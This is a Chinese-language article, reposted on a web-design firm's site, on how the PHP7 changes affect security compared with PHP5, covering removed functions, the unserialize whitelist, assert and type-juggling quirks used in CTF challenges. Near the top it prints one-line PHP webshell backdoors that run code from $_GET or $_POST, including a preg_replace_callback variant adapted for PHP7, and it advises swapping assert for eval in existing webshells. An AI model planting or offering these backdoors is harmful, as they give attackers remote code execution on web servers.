PHP7和PHP5在安全上有什么區(qū)別

本篇內(nèi)容主要講解“PHP7和PHP5在安全上有什么區(qū)別”,感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“PHP7和PHP5在安全上有什么區(qū)別”吧!

創(chuàng)新互聯(lián)建站是一家專業(yè)提供辛集企業(yè)網(wǎng)站建設(shè),專注與成都網(wǎng)站建設(shè)、網(wǎng)站建設(shè)、H5建站、小程序制作等業(yè)務(wù)。10年已為辛集眾多企業(yè)、政府機(jī)構(gòu)等服務(wù)。創(chuàng)新互聯(lián)專業(yè)的建站公司優(yōu)惠進(jìn)行中。

函數(shù)修改

1. preg_replace()不再支持/e修飾符

<?php preg_replace("/.*/e",$_GET["h"],".");  ?>

利用\e修飾符執(zhí)行代碼的后門(mén)大家也用了不少了,具體看官方的這段描述:

如果設(shè)置了這個(gè)被棄用的修飾符, preg_replace() 在進(jìn)行了對(duì)替換字符串的 后向引用替換之后, 將替換后的字符串作為php  代碼評(píng)估執(zhí)行(eval 函數(shù)方式),并使用執(zhí)行結(jié)果 作為實(shí)際參與替換的字符串。單引號(hào)、雙引號(hào)、反斜線()和 NULL 字符在  后向引用替換時(shí)會(huì)被用反斜線轉(zhuǎn)義.

很不幸,在PHP7以上版本不在支持\e修飾符,同時(shí)官方給了我們一個(gè)新的函數(shù)preg_replace_callback:

這里我們稍微改動(dòng)一下就可以利用它當(dāng)我們的后門(mén):

<?php preg_replace_callback("/.*/",function ($a){@eval($a[0]);},$_GET["h"]); ?>

PHP7和PHP5在安全上有什么區(qū)別

2. create_function()被廢棄

<?php $func =create_function('',$_POST['cmd']);$func(); ?>

少了一種可以利用當(dāng)后門(mén)的函數(shù),實(shí)際上它是通過(guò)執(zhí)行eval實(shí)現(xiàn)的??捎锌蔁o(wú)。

3. MySQL_*系列全員移除

如果你要在PHP7上面用老版本的mysql_*系列函數(shù)需要你自己去額外裝了,官方不在自帶,現(xiàn)在官方推薦的是mysqli或者pdo_mysql。這是否預(yù)示著未來(lái)SQL注入漏洞在PHP上的大幅減少呢~

4. unserialize()增加一個(gè)可選白名單參數(shù)

$data = unserialize($serializedObj1 , ["allowed_classes" => true]); $data2 = unserialize($serializedObj2 , ["allowed_classes" => ["MyClass1", "MyClass2"]]);

其實(shí)就是一個(gè)白名單,如果反序列數(shù)據(jù)里面的類名不在這個(gè)白名單內(nèi),就會(huì)報(bào)錯(cuò)。

PHP7和PHP5在安全上有什么區(qū)別

像這樣的報(bào)錯(cuò)!

可以是類名也可以是布爾數(shù)據(jù),如果是FALSE就會(huì)將所有的對(duì)象都轉(zhuǎn)換為_(kāi)_PHP_Incomplete_Class對(duì)象。TRUE是沒(méi)有限制的。也可以傳入類名實(shí)現(xiàn)白名單。

還好現(xiàn)在是可選不是必選,要是默認(rèn)FALSE逼程序員弄白名單那就真的吐血了。

5. assert()默認(rèn)不在可以執(zhí)行代碼

這就是眾多馬不能用的罪魁禍?zhǔn)琢?,太多的馬用assert()來(lái)執(zhí)行代碼了,這個(gè)更新基本就團(tuán)滅,一般情況下修改成eval即可正常運(yùn)行了~

提一下,菜刀在實(shí)現(xiàn)文件管理器的時(shí)候用的恰好也是assert函數(shù),這導(dǎo)致菜刀沒(méi)辦法在PHP7上正常運(yùn)行。

語(yǔ)法修改

1. foreach不再改變內(nèi)部數(shù)組指針

<?php $a = array('1','2','3'); foreach ($a as $k=>&$n){     echo ""; } print_r($a); foreach ($a as $k=>$n){     echo "";  } print_r($a);

這樣的代碼在php5中,是這樣的執(zhí)行結(jié)果:

PHP7和PHP5在安全上有什么區(qū)別

因?yàn)閿?shù)組最后一個(gè)元素的 $value 引用在 foreach  循環(huán)之后仍會(huì)保留,在第二個(gè)循環(huán)的時(shí)候?qū)嶋H上是對(duì)之前的指針不斷的賦值。php7中通過(guò)值遍歷時(shí),操作的值為數(shù)組的副本,不在對(duì)后續(xù)操作進(jìn)行影響。

這個(gè)改動(dòng)影響了某些cms的洞在PHP7上無(wú)法利用了&hellip;.你知道我指的是哪個(gè)洞的。

這個(gè)問(wèn)題在PHP7.0.0以后的版本又被改回去了,只影響這一個(gè)版本。

2. 8進(jìn)制字符容錯(cuò)率降低

在php5版本,如果一個(gè)八進(jìn)制字符如果含有無(wú)效數(shù)字,該無(wú)效數(shù)字將被靜默刪節(jié)。

<?php echo octdec( '012999999999999' ) . "\n"; echo octdec( '012' ) . "\n"; if (octdec( '012999999999999' )==octdec( '012' )){         echo ": )". "\n"; }

比如這樣的代碼在php5中的執(zhí)行結(jié)果如下:

PHP7和PHP5在安全上有什么區(qū)別

但是在php7里面會(huì)觸發(fā)一個(gè)解析錯(cuò)誤。

這個(gè)問(wèn)題同樣在PHP7.0.0以后的版本又被改回去了,只影響這一個(gè)版本。

3. 十六進(jìn)制字符串不再被認(rèn)為是數(shù)字

這個(gè)修改一出,以后CTF套路會(huì)少很多啊~

很多騷操作都不能用了~

這個(gè)沒(méi)什么好說(shuō)的,大家都懂。

<?php var_dump("0x123" == "291"); var_dump(is_numeric("0x123")); var_dump("0xe" + "0x1"); var_dump(substr("foo", "0x1")); ?>

以上代碼在PHP5運(yùn)行結(jié)果如下:

PHP7和PHP5在安全上有什么區(qū)別

PHP7運(yùn)行結(jié)果如下:

PHP7和PHP5在安全上有什么區(qū)別

你以為我要說(shuō)這個(gè)在后續(xù)版本被改回去了?不,目前截至PHP7.3版本依然沒(méi)有改回去的征兆,官方稱不會(huì)在改了。這個(gè)講道理還是蠻傷的。

4. 移除了 ASP 和 script PHP 標(biāo)簽

PHP7和PHP5在安全上有什么區(qū)別

現(xiàn)在只有這樣的標(biāo)簽?zāi)茉趐hp7上運(yùn)行了。

字面意思,影響其實(shí)不是很大(只是以后騷套路會(huì)少一點(diǎn))。

5. 超大浮點(diǎn)數(shù)類型轉(zhuǎn)換截?cái)?/strong>

將浮點(diǎn)數(shù)轉(zhuǎn)換為整數(shù)的時(shí)候,如果浮點(diǎn)數(shù)值太大,導(dǎo)致無(wú)法以整數(shù)表達(dá)的情況下, 在PHP5的版本中,轉(zhuǎn)換會(huì)直接將整數(shù)截?cái)啵⒉粫?huì)引發(fā)錯(cuò)誤。  在PHP7中,會(huì)報(bào)錯(cuò)。

CTF又少一個(gè)出題套路,這個(gè)問(wèn)題我只在CTF上見(jiàn)過(guò),影響應(yīng)該不大。

到此,相信大家對(duì)“PHP7和PHP5在安全上有什么區(qū)別”有了更深的了解,不妨來(lái)實(shí)際操作一番吧!這里是創(chuàng)新互聯(lián)網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!

網(wǎng)頁(yè)題目:PHP7和PHP5在安全上有什么區(qū)別
網(wǎng)站網(wǎng)址:http://muchs.cn/article10/pisego.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計(jì)公司、Google搜索引擎優(yōu)化、App設(shè)計(jì)、網(wǎng)站設(shè)計(jì)、營(yíng)銷型網(wǎng)站建設(shè)

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)